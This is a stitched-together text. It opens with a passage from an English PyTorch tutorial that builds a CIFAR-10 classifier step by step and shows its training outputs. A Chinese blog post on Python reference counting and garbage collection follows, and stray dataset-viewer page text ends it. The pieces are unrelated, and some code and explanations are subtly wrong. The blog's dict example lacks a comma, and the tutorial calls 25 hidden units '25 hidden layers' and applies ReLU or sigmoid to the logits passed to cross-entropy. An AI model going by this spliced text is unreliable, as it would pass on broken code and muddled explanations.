output = net(inputs) # but now, all we have to do is pass our inputs to the neural net
loss = loss_function(output, labels)
loss.backward()
optimizer.step()
print("----------------------------------------")
print("Output (UPDATE: Epoch #" + str(epoch + 1) + ", Batch #" + str(batch_idx + 1) + "):")
print(net(Variable(x))) # much better!
print("Should be getting closer to [0, 1, 1, 0]...")
print("----------------------------------------")
# Awesome, so we have a neural network (nn) in the actual PyTorch Net class.
# As it stands right now, there's tons of optimization that can be done here.
# But, at the risk of falling for premature optimization, let's get to the end and build our full-fledged CNN first.
----------------------------------------
Output (UPDATE: Epoch #1, Batch #1):
Variable containing:
0.5994
0.6015
0.5958
0.5919
[torch.FloatTensor of size 4x1]
Should be getting closer to [0, 1, 1, 0]...
----------------------------------------
Output (UPDATE: Epoch #2, Batch #1):
Variable containing:
0.5982
0.6003
0.5945
0.5907
[torch.FloatTensor of size 4x1]
Should be getting closer to [0, 1, 1, 0]...
----------------------------------------
Output (UPDATE: Epoch #3, Batch #1):
Variable containing:
0.5969
0.5991
0.5933
0.5895
[torch.FloatTensor of size 4x1]
Should be getting closer to [0, 1, 1, 0]...
----------------------------------------
10. Changing Our Input from Arbitrary Vectors to Images#
Links:
http://pytorch.org/docs/master/data.html - data utilities pytorch documentation
http://pytorch.org/tutorials/beginner/data_loading_tutorial.html - pytorch's data loading and processing tutorial
http://pytorch.org/docs/master/torchvision/transforms.html - transforms documentation
http://pytorch.org/tutorials/beginner/blitz/cifar10_tutorial.html - pytorch's data classifier tutorial
# In preparation for building our Convolutional Neural Network (CNN), we're going to stop using random, arbitrary vectors.
# Instead, we're going to use an actual standardized dataset: CIFAR-10
# We also have built in modules to help us load/wrangle the dataset, so we're going to use those too! (since we're spoiled)
transform = transforms.Compose( # we're going to use this to transform our data to make each sample more uniform
[
transforms.ToTensor(), # converts each sample from a (0-255, 0-255, 0-255) PIL Image format to a (0-1, 0-1, 0-1) FloatTensor format
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)) # for each of the 3 channels of the image, subtract mean 0.5 and divide by stdev 0.5
]) # the normalization makes each SGD iteration more stable and overall makes convergence easier
trainset = torchvision.datasets.CIFAR10(root='./data', train=True,
download=True, transform=transform) # this is all we need to get/wrangle the dataset!
trainloader = torch.utils.data.DataLoader(trainset, batch_size=4,
shuffle=True)
testset = torchvision.datasets.CIFAR10(root='./data', train=False,
download=True, transform=transform)
testloader = torch.utils.data.DataLoader(testset, batch_size=4,
shuffle=False)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') # each image can have 1 of 10 labels
# helper function to show an image
def imshow(img):
img = img / 2 + 0.5 # unnormalize
npimg = img.numpy()
plt.imshow(np.transpose(npimg, (1, 2, 0)))
# get some random training images
dataiter = iter(trainloader)
images, labels = dataiter.next()
# show images
imshow(torchvision.utils.make_grid(images))
# print labels
print(' '.join('%5s' % classes[labels[j]] for j in range(4)))
Files already downloaded and verifiedFiles already downloaded and verifiedhorse bird deer truck
# Now that we've got a lot of boilerplate code out of the way, here's how it fits in to what we did above:
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(32 * 32 * 3, 25) # now our first layer accepts inputs the size of the image's total information
self.fc2 = nn.Linear(25, 10) # we also have 25 hidden layers
self.sigmoid = nn.Sigmoid()
def forward(self, x):
x = x.view(-1, 32 * 32 * 3) # this just reshapes our tensor of image data so that we have <batch size>
x = self.fc1(x) # in one dimension, and then the image data in the other
x = self.sigmoid(x)
x = self.fc2(x)
x = self.sigmoid(x)
return x
net = Net()
NUMBER_OF_EPOCHS = 3
LEARNING_RATE = 1e-1
loss_function = nn.CrossEntropyLoss() # Changing our loss / cost function to work with our labels
optimizer = optim.SGD(net.parameters(), lr=LEARNING_RATE)
for epoch in range(NUMBER_OF_EPOCHS):
train_loader_iter = iter(trainloader)
for batch_idx, (inputs, labels) in enumerate(train_loader_iter):
net.zero_grad()
inputs, labels = Variable(inputs.float()), Variable(labels)
output = net(inputs)
loss = loss_function(output, labels)
loss.backward()
optimizer.step()
print("Iteration: " + str(epoch + 1))
Iteration: 1Iteration: 2Iteration: 3
# Awesome! Now it's trained. Time to test it:
dataiter = iter(testloader)
images, labels = dataiter.next() # just grabbing a sample from our test data set
imshow(torchvision.utils.make_grid(images)) # display the images we're going to predict
outputs = net(Variable(images)) # get our output from our neural network
_, predicted = torch.max(outputs.data, 1) # get our predictions from the output
print('Predicted: ', ' '.join('%5s' % classes[predicted[j]]
for j in range(4)))
# print images
print('GroundTruth: ', ' '.join('%5s' % classes[labels[j]] for j in range(4)))
# and let's look at the overall accuracy:
correct = 0
total = 0
for data in testloader:
images, labels = data
outputs = net(Variable(images))
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum()
print('Accuracy of the network on the 10000 test images: %d %%' % (
100 * correct / total))
# Hmm, maybe we can do better. Let's add convolutional layers.
Predicted: cat car ship planeGroundTruth: cat ship ship planeAccuracy of the network on the 10000 test images: 39 %
11. Adding a Convolutional Layer#
Links:
https://github.com/vdumoulin/conv_arithmetic/blob/master/README.md - Convolution animation
http://setosa.io/ev/image-kernels/ - Image kernels explained visually (really helpful)
http://colah.github.io/posts/2014-07-Understanding-Convolutions/ - good blog post on convolutions by Chris Olah
http://cs231n.github.io - CS231n at stanford on CNNs, really good content
# here's all the boilerplate again:
transform = transforms.Compose(
[
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=False, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=4, shuffle=True)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=False, transform=transform)
testloader = torch.utils.data.DataLoader(testset, batch_size=4, shuffle=False)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
def imshow(img):
img = img / 2 + 0.5
npimg = img.numpy()
plt.imshow(np.transpose(npimg, (1, 2, 0)))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5) # convolve each of our 3-channel images with 6 different 5x5 kernels, giving us 6 feature maps
self.fc1 = nn.Linear(4704, 120) # but that results in a 4x6x28x28 = 18816 dimensional output, 18816/4 = 4704 inputs per image.
self.fc2 = nn.Linear(120, 10)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
x = self.conv1(x)
x = self.sigmoid(x)
x = x.view(-1, 4704) # since our output from conv1 is 4x6x28x28, we need to flatten it into a 4x4704 (samples x features) tensor to feed it into a linear layer
x = self.fc1(x)
x = self.sigmoid(x)
x = self.fc2(x)
x = self.sigmoid(x)
return x
net = Net()
NUMBER_OF_EPOCHS = 3
LEARNING_RATE = 1e-1
loss_function = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=LEARNING_RATE)
for epoch in range(NUMBER_OF_EPOCHS):
train_loader_iter = iter(trainloader)
for batch_idx, (inputs, labels) in enumerate(train_loader_iter):
net.zero_grad()
inputs, labels = Variable(inputs.float()), Variable(labels)
output = net(inputs)
loss = loss_function(output, labels)
loss.backward()
optimizer.step()
print("Iteration: " + str(epoch + 1))
Iteration: 1Iteration: 2Iteration: 3
# Holy guacamole, that takes a LOT longer. Those convolutions are expensive.
# In the next section we'll make that a little quicker.
# For now, let's see how much our predictions improved.
dataiter = iter(testloader)
images, labels = dataiter.next()
imshow(torchvision.utils.make_grid(images))
outputs = net(Variable(images))
_, predicted = torch.max(outputs.data, 1)
print('Predicted: ', ' '.join('%5s' % classes[predicted[j]]
for j in range(4)))
print('GroundTruth: ', ' '.join('%5s' % classes[labels[j]] for j in range(4)))
Predicted: cat truck ship shipGroundTruth: cat ship ship plane
correct = 0
total = 0
for data in testloader:
images, labels = data
outputs = net(Variable(images))
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum()
print('Accuracy of the network on the 10000 test images: %d %%' % (
100 * correct / total))
# Okay... pretty good improvement. Again, before we prematurely optimize, let's add some pooling layers to make it quicker.
# THEN we'll go ham on the optimizations.
Accuracy of the network on the 10000 test images: 45 %
Links:
https://www.quora.com/What-is-max-pooling-in-convolutional-neural-networks - Quora; what is max pooling?
http://pytorch.org/docs/master/_modules/torch/nn/modules/pooling.html - pytorch documentation on pooling
# and again, boilerplate:
transform = transforms.Compose(
[
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=False, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=4, shuffle=True)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=False, transform=transform)
testloader = torch.utils.data.DataLoader(testset, batch_size=4, shuffle=False)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
def imshow(img):
img = img / 2 + 0.5
npimg = img.numpy()
plt.imshow(np.transpose(npimg, (1, 2, 0)))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2) # in any 2x2 square on each of our feature maps, take the most important (highest) one
self.fc1 = nn.Linear(1176, 120) # since we've pooled our outputs from the convolution, our input is reduced: 4704 -> 1176
self.fc2 = nn.Linear(120, 10)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
x = self.conv1(x)
x = self.sigmoid(x) # returns x of size: torch.Size([4, 6, 28, 28])
x = self.pool(x) # returns x of size: torch.Size([4, 6, 14, 14]) (so we have to adjust our linear input again)
x = x.view(-1, 1176) # now our input to the linear layer is going to be 4 by 6 * 14 * 14 = 1176
x = self.fc1(x)
x = self.sigmoid(x)
x = self.fc2(x)
x = self.sigmoid(x)
return x
net = Net()
NUMBER_OF_EPOCHS = 3
LEARNING_RATE = 1e-1
loss_function = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=LEARNING_RATE)
for epoch in range(NUMBER_OF_EPOCHS):
train_loader_iter = iter(trainloader)
for batch_idx, (inputs, labels) in enumerate(train_loader_iter):
net.zero_grad()
inputs, labels = Variable(inputs.float()), Variable(labels)
output = net(inputs)
loss = loss_function(output, labels)
loss.backward()
optimizer.step()
print("Iteration: " + str(epoch + 1))
Iteration: 1Iteration: 2Iteration: 3
# Pretty significant speedup! Let's see how it affects accuracy:
dataiter = iter(testloader)
images, labels = dataiter.next()
imshow(torchvision.utils.make_grid(images))
outputs = net(Variable(images))
_, predicted = torch.max(outputs.data, 1)
print('Predicted: ', ' '.join('%5s' % classes[predicted[j]]
for j in range(4)))
print('GroundTruth: ', ' '.join('%5s' % classes[labels[j]] for j in range(4)))
Predicted: cat car ship shipGroundTruth: cat ship ship plane
correct = 0
total = 0
for data in testloader:
images, labels = data
outputs = net(Variable(images))
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum()
print('Accuracy of the network on the 10000 test images: %d %%' % (
100 * correct / total))
# Not by much! Awesome!
# Now, let's add a few more layers, change our nonlinearities around, and do some other house keeping:
Accuracy of the network on the 10000 test images: 45 %
{' '}
13. Do Some Final Optimizations (I.E. Making Our First Sigmoid a "Relu", and Adding More Layers)#
Links:
https://github.com/Kulbear/deep-learning-nano-foundation/wiki/ReLU-and-Softmax-Activation-Functions - different activation functions
https://stats.stackexchange.com/questions/126238/what-are-the-advantages-of-relu-over-sigmoid-function-in-deep-neural-networks - advantages of ReLU over sigmoid
transform = transforms.Compose(
[
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=False, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=4, shuffle=True)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=False, transform=transform)
testloader = torch.utils.data.DataLoader(testset, batch_size=4, shuffle=False)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
def imshow(img):
img = img / 2 + 0.5
npimg = img.numpy()
plt.imshow(np.transpose(npimg, (1, 2, 0)))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 10, 5) # Let's add more feature maps - that might help
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(10, 20, 5) # And another conv layer with even more feature maps
self.fc1 = nn.Linear(20 * 5 * 5, 120) # and finally, adjusting our first linear layer's input to our previous output
self.fc2 = nn.Linear(120, 10)
def forward(self, x):
x = self.conv1(x)
x = F.relu(x) # we're changing our nonlinearity / activation function from sigmoid to ReLU for a slight speedup
x = self.pool(x)
x = self.conv2(x)
x = F.relu(x)
x = self.pool(x) # after this pooling layer, we're down to a torch.Size([4, 20, 5, 5]) tensor.
x = x.view(-1, 20 * 5 * 5) # so let's adjust our tensor again.
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
x = F.relu(x)
return x
# net = Net()
net = Net().cuda() # Let's make our NN run on the GPU (I didn't splurge on this GTX 1080 for nothing...)
NUMBER_OF_EPOCHS = 25 # Let's also increase our training cycles
LEARNING_RATE = 1e-2 # And decrease our learning rate a little bit to compensate
loss_function = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=LEARNING_RATE)
for epoch in range(NUMBER_OF_EPOCHS):
train_loader_iter = iter(trainloader)
for batch_idx, (inputs, labels) in enumerate(train_loader_iter):
net.zero_grad()
inputs, labels = Variable(inputs.float().cuda()), Variable(labels.cuda()) # Let's also make these tensors GPU compatible
output = net(inputs)
loss = loss_function(output, labels)
loss.backward()
optimizer.step()
if epoch % 5 is 0:
print("Iteration: " + str(epoch + 1))
Iteration: 1Iteration: 6Iteration: 11Iteration: 16Iteration: 21
dataiter = iter(testloader)
images, labels = dataiter.next()
imshow(torchvision.utils.make_grid(images))
outputs = net(Variable(images.cuda()))
_, predicted = torch.max(outputs.data, 1)
print('Predicted: ', ' '.join('%5s' % classes[predicted[j]]
for j in range(4)))
print('GroundTruth: ', ' '.join('%5s' % classes[labels[j]] for j in range(4)))
Predicted: cat ship plane planeGroundTruth: cat ship ship plane
correct = 0
total = 0
for data in testloader:
images, labels = data
inputs = Variable(images.cuda())
labels = labels.cuda()
outputs = net(inputs)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum()
print('Accuracy of the network on the 10000 test images: %d %%' % (
100 * correct / total))
# Awesome! A lot better!
Accuracy of the network on the 10000 test images: 61 %
14. Bask... In the Glory That Is Our Newly Created Convolutional Neural Network (Cnn)!#
Links:
http://www.yaronhadad.com/deep-learning-most-amazing-applications/ - stuff you can do now
https://machinelearningmastery.com/inspirational-applications-deep-learning/ - more stuff you can do
# Awesome - we have a full blown convolutional neural network!
# Let's condense some stuff and put it all together without comments:
transform = transforms.Compose(
[
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=False, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=4, shuffle=True)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=False, transform=transform)
testloader = torch.utils.data.DataLoader(testset, batch_size=4, shuffle=False)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
def imshow(img):
img = img / 2 + 0.5
npimg = img.numpy()
plt.imshow(np.transpose(npimg, (1, 2, 0)))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 10, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(10, 20, 5)
self.fc1 = nn.Linear(20 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 10)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 20 * 5 * 5)
x = F.relu(self.fc1(x) )
x = F.relu(self.fc2(x))
return x
net = Net().cuda()
NUMBER_OF_EPOCHS = 25
LEARNING_RATE = 1e-2
loss_function = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=LEARNING_RATE)
for epoch in range(NUMBER_OF_EPOCHS):
train_loader_iter = iter(trainloader)
for batch_idx, (inputs, labels) in enumerate(train_loader_iter):
net.zero_grad()
inputs, labels = Variable(inputs.float().cuda()), Variable(labels.cuda())
output = net(inputs)
loss = loss_function(output, labels)
loss.backward()
optimizer.step()
if epoch % 5 is 0:
print("Iteration: " + str(epoch + 1))
dataiter = iter(testloader)
images, labels = dataiter.next()
imshow(torchvision.utils.make_grid(images))
outputs = net(Variable(images.cuda()))
_, predicted = torch.max(outputs.data, 1)
print('Predicted: ', ' '.join('%5s' % classes[predicted[j]]
for j in range(4)))
print('GroundTruth: ', ' '.join('%5s' % classes[labels[j]] for j in range(4)))
correct = 0
total = 0
for data in testloader:
images, labels = data
labels = labels.cuda()
outputs = net(Variable(images.cuda()))
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum()
print('Accuracy of the network on the 10000 test images: %d %%' % (
100 * correct / total))
Iteration: 1Iteration: 6Iteration: 11Iteration: 16Iteration: 21Predicted: truck car plane planeGroundTruth: cat ship ship planeAccuracy of the network on the 10000 test images: 62 %
|
文章最后更新时间为:2019年08月20日 11:32:15
对于C语言来说,内存泄露是个很常见的事故,因此写代码的时候要格外注意无用内存的释放,但是对于pythoner来说,一般都不会关心这些,因为python会自己去管理内存。
但是最近我遇到一个问题,我在写一个程序,将会占用很大的内存,我先使用了一个集合用来存储数据。
比如下面这样
example_set = set()
for i in range(10000000):
example_set.add(i)
然后我需要将多个数据组合成新的几个:
example_list = []
for data in example_set:
dic = {
"id":random.randint(1,10000)
"data":data
}
example_list.append(dic)
后续的话还需传递:
example_list_1 = example_list
这样以前的数据比如example_set,example_list都不再需要了,而他们又是全局变量,又占用很大的空间,我是否需要手动释放这些数据,我尝试了使用del来手动释放这些数据,但是出现了问题,于是学习一下python的内存回收。
首先先用实例感受一下python的内存机制.
我们先定义一个函数用来查看当前进程占用的内存大小:
import os
import psutil
# 显示当前 python 程序占用的内存大小
def show_memory_info(hint):
pid = os.getpid()
p = psutil.Process(pid)
info = p.memory_full_info()
memory = info.uss / 1024. / 1024
print('{} memory used: {} MB'.format(hint, memory))
然后尝试写一个比较大的列表,然后复制一下:
import random
show_memory_info('step1')
a = [random.randint(1,10000) for i in range(1000000)]
show_memory_info('step2')
b = a
show_memory_info('step3')
结果为:
step1 memory used: 9.7578125 MBstep2 memory used: 47.75390625 MBstep3 memory used: 47.78515625 MB
很显然这里的b = a并没有产生更多的内存占用。因为这里的赋值属于对象引用的传递,并不会重新划分内存,而是直接将b指向a指向的内存。
那么不直接赋值,而是合成呢?可以看下面的例子:
import random
show_memory_info('step1')
a = [random.randint(1,10000) for i in range(1000000)]
show_memory_info('step2')
b = []
for i in a:
b.append({'num':i})
show_memory_info('step3')
del a
show_memory_info('step4')
结果:
step1 memory used: 9.3046875 MBstep2 memory used: 47.3046875 MBstep3 memory used: 288.8984375 MBstep4 memory used: 281.265625 MB
第一步申请a占用了47MB内存,但是很显然step4释放了a之后,内存只减少了7MB,这说明a和b其实是有交叉引用的,也就是说a和b指向的内存并不是完全分开的。
这里其实对应了python一切皆对象的说法,a和b只是指针,他们指向内存中的某块区域,用a合成b的时候,并不是重新划分内存来保存b的值,其公共部分还是指向原来的内存。
得出结论,参数传递和重新合成并不会占用更多内存,除非是深拷贝
其实从上面的例子中我们已经知道了,一般情况下无需手动释放不需要的变量,那么python是如何释放不必要的内存的呢?
其中最主要的机制是引用计数当一个对象的引用计数为0时,就意味着没有指针会指向这个对象,这个对象自然成了垃圾,需要回收。
看一个例子:
import sys
a = []
# 两次引用,一次来自 a,一次来自 getrefcount
print(sys.getrefcount(a))
def func(a):
# 四次引用,a,python 的函数调用栈,函数参数,和 getrefcount
print(sys.getrefcount(a))
func(a)
# 两次引用,一次来自 a,一次来自 getrefcount,函数 func 调用已经不存在
print(sys.getrefcount(a))
########## 输出 ##########
2
4
2
sys.getrefcount() 这个函数,可以查看一个变量的引用次数,其自身也会引入一次计数。
在函数调用发生的时候,会产生额外的两次引用,一次来自函数栈,另一个是函数参数。
import sys
a = []
print(sys.getrefcount(a)) # 两次
b = a
print(sys.getrefcount(a)) # 三次
c = b
d = b
e = c
f = e
g = d
print(sys.getrefcount(a)) # 八次
########## 输出 ##########
2
3
8
a、b、c、d、e、f、g 这些变量全部指代的是同一个对象,所以这个对象的最后会有8次引用。
理解引用这个概念后,垃圾回收也就很容易理解了。
如果偏想手动释放内存,可以先调用 del a 来删除一个对象;然后强制调用 gc.collect(),即可手动启动垃圾回收。看下面的例子
import gc
show_memory_info('initial')
a = [i for i in range(10000000)]
show_memory_info('after a created')
del a
gc.collect()
show_memory_info('finish')
print(a)
########## 输出 ##########
initial memory used: 48.1015625 MB
after a created memory used: 434.3828125 MB
finish memory used: 48.33203125 MB
---------------------------------------------------------------------------
NameError Traceback (most recent call last)
<ipython-input-12-153e15063d8a> in <module>
11
12 show_memory_info('finish')
---> 13 print(a)
NameError: name 'a' is not defined
除了引用计数外,python的垃圾回收还有其他机制:标记清除+分代收集
其余两种机制还有待学习,因和需求关系不大,鸽了
python一切皆对象,普通的值的传递只是引用的传递。
垃圾回收是 Python自带的机制,用于自动释放不会再用到的内存空间
引用计数是其中最简单的实现,这只是充分非必要条件
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.